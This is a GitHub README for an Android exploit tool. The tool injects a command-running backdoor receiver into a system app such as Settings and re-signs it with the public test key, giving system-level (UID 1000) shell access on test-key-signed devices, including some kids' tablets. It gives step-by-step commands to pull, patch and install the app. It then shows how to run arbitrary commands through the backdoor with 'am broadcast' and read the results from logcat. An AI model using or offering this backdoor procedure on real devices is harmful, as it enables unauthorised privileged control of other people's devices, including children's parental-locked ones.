Skip to content

IsHacker003/testbuild_exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

33 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

testbuild_exploit

This is an exploit designed to get elevated privilleges (UID 1000) on locked-down but vulnerable devices, where the Android build is signed with a test key (for example, some kids tablets). It works by patching a system app which runs with UID 1000 (typically the settings app) to inject a backdoor into it, through which you can run commands as the app's user. Though technically, you can patch any app with this backdoor, not just system apps. After patching, the app is signed with testkey, allowing you to install it on top of the existing system app. The system user (UID 1000) has almost as much privillege as the root user, but what you can or cannot do will vary depending on the SELinux rules of the ROM. On some ROMs, the patched settings app won't even launch, due to SELinux restrcting the execution of apps with UID 1000 when they are installed in /data/app.

Instructions

Pre-requisites/dependencies:

  1. A working Java runtime environment (to run .jar files located in bin/) and JDK (to compile the patch)
  2. Python 3 (to run the patcher script patcher.py)
  3. A GNU/Linux or macOS PC. Windows will never be officially supported, so you are welcome to fork this repo and add Windows support.
  4. An Android device running a ROM signed with test keys
  5. Ability to install APKs on the device
  6. (Optional) USB Debugging support on the device, and latest platform-tools installed on your PC.

Steps

  1. Clone this repo:

    git clone https://github.com/IsHacker003/testbuild_exploit && cd testbuild_exploit
    
  2. Place the APK of the system app you want to patch inside the "apk" folder, after renaming it to app.apk. You can either get the APK from the stock ROM or pull it from the device (if you have ADB/USB debugging access). For example, to pull the Settings APK (DO NOT COPY):

    adb pull /system/priv-app/Settings/Settings.apk && mv Settings.apk apk/app.apk
    

    NOTE: If the APK is odexed (i.e there are no classes.dex files inside the APK), you need to deodex it first.

  3. Run patcher.py

    python3 patcher.py
    
  4. Enter the package name of the app to be patched. If you don't know the package name, first decompile the apk using apktool or whatever program and check the package name. If the package name is com.android.settings (i.e you are patching the Settings app), just press enter to continue the patching process. No need to type anything.

  5. After the patching process has finished, just install the generated <package name>.apk file on the device normally. If you have USB debugging access, you can install it directly using ADB. For example:

    adb install com.android.settings.apk
    

Enjoy! Now you are ready to run commands.

Running commands

There are two ways to run commands through the backdoor.

1. ADB shell:

If you have USB debugging on the device, type this in adb shell:

am broadcast -n <package name>/.CmdReceiver -e Cmd "<command>"

Here <package name> is the package name of the patched app, and <command> is the shell command that you want to run. For example, if you want to run the command whoami and you have patched the Settings app, type:

am broadcast -n com.android.settings/.CmdReceiver -e Cmd "whoami"

To get the output of the command, type:

adb logcat | grep "CmdReceiver"

(Run it in a different terminal window)

For example, the output of the above command (whoami) will be like:

10-08 13:02:20.356  4208  4208 D CmdReceiver: system

Here, the part after CmdReceiver: is your output (which is "system" in this case).

2. App:

If the device doesn't allow USB debugging (or if you just want a more convenient method), you can use my Command executor app.

About

Exploit to get elevated privilleges on devices where the Android build is signed with test keys.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published